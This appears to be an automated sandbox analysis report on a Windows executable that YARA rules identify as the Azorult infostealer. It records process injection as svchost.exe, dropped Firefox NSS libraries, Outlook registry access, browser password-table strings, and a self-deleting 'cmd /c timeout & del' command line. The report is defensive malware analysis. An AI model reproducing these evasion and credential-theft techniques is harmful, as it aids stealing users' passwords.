          Source: 0.2.4QihT6CwD8.exe.1160000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Azorult_38fce9ea reference_sample = 405d1e6196dc5be1f46a1bd07c655d1d4b36c32f965d9a1b6d4859d3f9b84491, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Azorult, fingerprint = 0655018fc803469c6d89193b75b4967fd02400fae07364ffcd11d1bc6cbbe74a, id = 38fce9ea-a94e-49d3-8eef-96fe06ad27f8, last_modified = 2021-10-04
          Source: 0.2.4QihT6CwD8.exe.1160000.1.raw.unpack, type: UNPACKEDPEMatched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
          Source: 0.2.4QihT6CwD8.exe.1160000.1.raw.unpack, type: UNPACKEDPEMatched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Azorult_38fce9ea reference_sample = 405d1e6196dc5be1f46a1bd07c655d1d4b36c32f965d9a1b6d4859d3f9b84491, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Azorult, fingerprint = 0655018fc803469c6d89193b75b4967fd02400fae07364ffcd11d1bc6cbbe74a, id = 38fce9ea-a94e-49d3-8eef-96fe06ad27f8, last_modified = 2021-10-04
          Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
          Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.svchost.exe.6884d02.7.raw.unpack, type: UNPACKEDPEMatched rule: OlympicDestroyer_1 author = kevoreilly, description = OlympicDestroyer Payload, cape_type = OlympicDestroyer Payload
          Source: 1.2.svchost.exe.68195b1.5.raw.unpack, type: UNPACKEDPEMatched rule: OlympicDestroyer_1 author = kevoreilly, description = OlympicDestroyer Payload, cape_type = OlympicDestroyer Payload
          Source: 1.2.svchost.exe.67f75c4.6.raw.unpack, type: UNPACKEDPEMatched rule: OlympicDestroyer_1 author = kevoreilly, description = OlympicDestroyer Payload, cape_type = OlympicDestroyer Payload
          Source: 00000001.00000002.1774295463.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Azorult_38fce9ea reference_sample = 405d1e6196dc5be1f46a1bd07c655d1d4b36c32f965d9a1b6d4859d3f9b84491, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Azorult, fingerprint = 0655018fc803469c6d89193b75b4967fd02400fae07364ffcd11d1bc6cbbe74a, id = 38fce9ea-a94e-49d3-8eef-96fe06ad27f8, last_modified = 2021-10-04
          Source: 00000001.00000002.1774295463.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
          Source: 00000001.00000002.1774295463.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.1674725179.0000000001160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Azorult_38fce9ea reference_sample = 405d1e6196dc5be1f46a1bd07c655d1d4b36c32f965d9a1b6d4859d3f9b84491, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Azorult, fingerprint = 0655018fc803469c6d89193b75b4967fd02400fae07364ffcd11d1bc6cbbe74a, id = 38fce9ea-a94e-49d3-8eef-96fe06ad27f8, last_modified = 2021-10-04
          Source: 00000000.00000002.1674725179.0000000001160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
          Source: 00000000.00000002.1674725179.0000000001160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal100.phis.troj.spyw.evad.winEXE@8/53@1/1
          Source: C:\Users\user\Desktop\4QihT6CwD8.exeCode function: 0_2_003C37B5 GetLastError,FormatMessageW,0_2_003C37B5
          Source: C:\Users\user\Desktop\4QihT6CwD8.exeCode function: 0_2_003B10BF AdjustTokenPrivileges,CloseHandle,0_2_003B10BF
          Source: C:\Users\user\Desktop\4QihT6CwD8.exeCode function: 0_2_003B16C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_003B16C3
          Source: C:\Users\user\Desktop\4QihT6CwD8.exeCode function: 0_2_003C51CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_003C51CD
          Source: C:\Users\user\Desktop\4QihT6CwD8.exeCode function: 0_2_003DA67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_003DA67C
          Source: C:\Users\user\Desktop\4QihT6CwD8.exeCode function: 0_2_003C648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize,0_2_003C648E
          Source: C:\Users\user\Desktop\4QihT6CwD8.exeCode function: 0_2_003542A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_003542A2
          Source: C:\Windows\SysWOW64\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\AFA7A44E6-9414907A-8AD8678F-2AF08C37-E4AC1EF7
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6816:120:WilError_03
          Source: C:\Users\user\Desktop\4QihT6CwD8.exeFile created: C:\Users\user\AppData\Local\Temp\aut40C4.tmpJump to behavior
          Source: 4QihT6CwD8.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\4QihT6CwD8.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: svchost.exe, 00000001.00000002.1775549667.00000000067E0000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.1.drBinary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
          Source: svchost.exe, 00000001.00000002.1775549667.00000000067E0000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.1.drBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
          Source: svchost.exe, 00000001.00000002.1775549667.00000000067E0000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.1.drBinary or memory string: SELECT ALL %s FROM %s WHERE id=$ID;
          Source: svchost.exe, 00000001.00000002.1775549667.00000000067E0000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.1.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;
          Source: svchost.exe, 00000001.00000002.1775549667.00000000067E0000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.1.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
          Source: svchost.exe, 00000001.00000002.1775549667.00000000067E0000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.1.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
          Source: svchost.exe, 00000001.00000002.1775549667.00000000067E0000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.1.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
          Source: svchost.exe, 00000001.00000002.1775549667.00000000067E0000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.1.drBinary or memory string: UPDATE %s SET %s WHERE id=$ID;
          Source: svchost.exe, 00000001.00000002.1775549667.00000000067E0000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.1.drBinary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
          Source: svchost.exe, 00000001.00000002.1775549667.00000000067E0000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.1.drBinary or memory string: SELECT ALL id FROM %s WHERE %s;
          Source: svchost.exe, 00000001.00000002.1775549667.00000000067E0000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.1.drBinary or memory string: SELECT ALL id FROM %s;
          Source: svchost.exe, 00000001.00000002.1775549667.00000000067E0000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.1.drBinary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
          Source: svchost.exe, 00000001.00000002.1775549667.00000000067E0000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.1.drBinary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
          Source: svchost.exe, 00000001.00000002.1775549667.00000000067E0000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.1.drBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
          Source: svchost.exe, 00000001.00000002.1775549667.00000000067E0000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.1.drBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
          Source: svchost.exe, 00000001.00000002.1775549667.00000000067E0000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.1.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
          Source: svchost.exe, 00000001.00000002.1775549667.00000000067E0000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.1.drBinary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index */ path TEXT, /* Path to page from root */ pageno INTEGER, /* Page number */ pagetype TEXT, /* 'internal', 'leaf' or 'overflow' */ ncell INTEGER, /* Cells on page (0 for overflow) */ payload INTEGER, /* Bytes of payload on this page */ unused INTEGER, /* Bytes of unused space on this page */ mx_payload INTEGER, /* Largest payload size of all cells */ pgoffset INTEGER, /* Offset of page in file */ pgsize INTEGER, /* Size of the page */ schema TEXT HIDDEN /* Database schema being analyzed */);
          Source: svchost.exe, 00000001.00000002.1775549667.00000000067E0000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.1.drBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
          Source: svchost.exe, 00000001.00000002.1775549667.00000000067E0000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.1.drBinary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
          Source: svchost.exe, 00000001.00000003.1734018714.0000000003268000.00000004.00000020.00020000.00000000.sdmp, 40885317949963744506502.tmp.1.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
          Source: 4QihT6CwD8.exeReversingLabs: Detection: 60%
          Source: unknownProcess created: C:\Users\user\Desktop\4QihT6CwD8.exe "C:\Users\user\Desktop\4QihT6CwD8.exe"
          Source: C:\Users\user\Desktop\4QihT6CwD8.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\4QihT6CwD8.exe"
          Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "svchost.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe C:\Windows\system32\timeout.exe 3
          Source: C:\Users\user\Desktop\4QihT6CwD8.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\4QihT6CwD8.exe"Jump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "svchost.exe"Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe C:\Windows\system32\timeout.exe 3Jump to behavior
          Source: C:\Users\user\Desktop\4QihT6CwD8.exeSection loaded: wsock32.dllJump to behavior
          Source: C:\Users\user\Desktop\4QihT6CwD8.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\4QihT6CwD8.exeSection loaded: winmm.dllJump to behavior
          Source: C:\Users\user\Desktop\4QihT6CwD8.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Users\user\Desktop\4QihT6CwD8.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Users\user\Desktop\4QihT6CwD8.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\4QihT6CwD8.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\Desktop\4QihT6CwD8.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\4QihT6CwD8.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\4QihT6CwD8.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\4QihT6CwD8.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: crtdll.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mozglue.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: winmm.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wsock32.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: vcruntime140.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: dbghelp.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: msvcp140.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: vaultcli.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ieframe.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: netapi32.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wkscli.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mlang.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: edputil.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: windows.staterepositoryps.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: appresolver.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: slc.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: pcacli.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: sfc_os.dllJump to behavior
          Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\OutlookJump to behavior
          Source: 4QihT6CwD8.exeStatic file information: File size 1223168 > 1048576
          Source: 4QihT6CwD8.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
          Source: 4QihT6CwD8.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
          Source: 4QihT6CwD8.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
          Source: 4QihT6CwD8.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: 4QihT6CwD8.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
          Source: 4QihT6CwD8.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
          Source: 4QihT6CwD8.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: svchost.exe, 00000001.00000002.1775484203.00000000066D4000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-locale-l1-1-0.dll.1.dr
          Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: svchost.exe, 00000001.00000002.1775484203.00000000066D4000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-runtime-l1-1-0.dll.1.dr
          Source: Binary string: z:\build\build\src\obj-firefox\mozglue\build\mozglue.pdb source: svchost.exe, 00000001.00000002.1775549667.00000000067E0000.00000004.00001000.00020000.00000000.sdmp, mozglue.dll.1.dr
          Source: Binary string: z:\build\build\src\obj-firefox\security\nss3.pdb source: svchost.exe, 00000001.00000002.1775549667.00000000067E0000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.1.dr
          Source: Binary string: ucrtbase.pdb source: svchost.exe, 00000001.00000002.1775549667.00000000067E0000.00000004.00001000.00020000.00000000.sdmp, ucrtbase.dll.1.dr
          Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: svchost.exe, 00000001.00000002.1775484203.00000000066D4000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-file-l1-2-0.dll.1.dr
          Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: svchost.exe, 00000001.00000002.1775484203.00000000066D4000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-memory-l1-1-0.dll.1.dr
          Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: svchost.exe, 00000001.00000002.1775549667.00000000067E0000.00000004.00001000.00020000.00000000.sdmp, freebl3.dll.1.dr
          Source: Binary string: api-ms-win-core-debug-l1-1-0.pdb source: svchost.exe, 00000001.00000002.1775484203.00000000066D4000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-debug-l1-1-0.dll.1.dr
          Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: svchost.exe, 00000001.00000002.1775484203.00000000066D4000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-sysinfo-l1-1-0.dll.1.dr
          Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: svchost.exe, 00000001.00000002.1775484203.00000000066D4000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-filesystem-l1-1-0.dll.1.dr
          Source: Binary string: wntdll.pdb source: 4QihT6CwD8.exe, 00000000.00000003.1669238946.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, 4QihT6CwD8.exe, 00000000.00000003.1673939585.0000000003A40000.00000004.00001000.00020000.00000000.sdmp
          Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: svchost.exe, 00000001.00000002.1775484203.00000000066D4000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-stdio-l1-1-0.dll.1.dr
          Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: svchost.exe, 00000001.00000002.1775484203.00000000066D4000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-heap-l1-1-0.dll.1.dr
          Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: svchost.exe, 00000001.00000002.1775484203.00000000066D4000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-util-l1-1-0.dll.1.dr
          Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: svchost.exe, 00000001.00000002.1775484203.00000000066D4000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-synch-l1-1-0.dll.1.dr
          Source: Binary string: vcruntime140.i386.pdbGCTL source: svchost.exe, 00000001.00000002.1775549667.00000000067E0000.00000004.00001000.00020000.00000000.sdmp, vcruntime140.dll.1.dr
          Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: svchost.exe, 00000001.00000002.1775484203.00000000066D4000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-environment-l1-1-0.dll.1.dr
          Source: Binary string: z:\build\build\src\obj-firefox\mozglue\build\mozglue.pdb11 source: svchost.exe, 00000001.00000002.1775549667.00000000067E0000.00000004.00001000.00020000.00000000.sdmp, mozglue.dll.1.dr
          Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: svchost.exe, 00000001.00000002.1775484203.00000000066D4000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-errorhandling-l1-1-0.dll.1.dr
          Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: svchost.exe, 00000001.00000002.1775484203.00000000066D4000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-processthreads-l1-1-0.dll.1.dr
          Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: svchost.exe, 00000001.00000002.1775549667.00000000067E0000.00000004.00001000.00020000.00000000.sdmp, freebl3.dll.1.dr
          Source: Binary string: api-ms-win-core-console-l1-1-0.pdb source: svchost.exe, 00000001.00000002.1775484203.00000000066D4000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-console-l1-1-0.dll.1.dr
          Source: Binary string: api-ms-win-core-file-l1-1-0.pdb source: svchost.exe, 00000001.00000002.1775484203.00000000066D4000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-file-l1-1-0.dll.1.dr
          Source: Binary string: api-ms-win-crt-private-l1-1-0.pdb source: svchost.exe, 00000001.00000002.1775484203.00000000066D4000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-private-l1-1-0.dll.1.dr
          Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: svchost.exe, 00000001.00000002.1775484203.00000000066D4000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-convert-l1-1-0.dll.1.dr
          Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: svchost.exe, 00000001.00000002.1775549667.00000000067E0000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.1.dr
          Source: Binary string: msvcp140.i386.pdb source: svchost.exe, 00000001.00000002.1775549667.00000000067E0000.00000004.00001000.00020000.00000000.sdmp, msvcp140.dll.1.dr
          Source: Binary string: ucrtbase.pdbUGP source: svchost.exe, 00000001.00000002.1775549667.00000000067E0000.00000004.00001000.00020000.00000000.sdmp, ucrtbase.dll.1.dr
          Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: svchost.exe, 00000001.00000002.1775484203.00000000066D4000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-profile-l1-1-0.dll.1.dr
          Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: svchost.exe, 00000001.00000002.1775484203.00000000066D4000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-time-l1-1-0.dll.1.dr
          Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb-- source: svchost.exe, 00000001.00000002.1775549667.00000000067E0000.00000004.00001000.00020000.00000000.sdmp, nssdbm3.dll.1.dr
          Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: svchost.exe, 00000001.00000002.1775484203.00000000066D4000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-handle-l1-1-0.dll.1.dr
          Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: svchost.exe, 00000001.00000002.1775484203.00000000066D4000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-synch-l1-2-0.dll.1.dr
          Source: Binary string: wntdll.pdbUGP source: 4QihT6CwD8.exe, 00000000.00000003.1669238946.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, 4QihT6CwD8.exe, 00000000.00000003.1673939585.0000000003A40000.00000004.00001000.00020000.00000000.sdmp
          Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: svchost.exe, 00000001.00000002.1775484203.00000000066D4000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-processenvironment-l1-1-0.dll.1.dr
          Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: svchost.exe, 00000001.00000002.1775484203.00000000066D4000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-datetime-l1-1-0.dll.1.dr
          Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: svchost.exe, 00000001.00000002.1775484203.00000000066D4000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-conio-l1-1-0.dll.1.dr
          Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: svchost.exe, 00000001.00000002.1775484203.00000000066D4000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-localization-l1-2-0.dll.1.dr
          Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: svchost.exe, 00000001.00000002.1775484203.00000000066D4000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-math-l1-1-0.dll.1.dr
          Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: svchost.exe, 00000001.00000002.1775549667.00000000067E0000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.1.dr
          Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: svchost.exe, 00000001.00000002.1775484203.00000000066D4000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-processthreads-l1-1-1.dll.1.dr
          Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: svchost.exe, 00000001.00000002.1775484203.00000000066D4000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-namedpipe-l1-1-0.dll.1.dr
          Source: Binary string: vcruntime140.i386.pdb source: svchost.exe, 00000001.00000002.1775549667.00000000067E0000.00000004.00001000.00020000.00000000.sdmp, vcruntime140.dll.1.dr
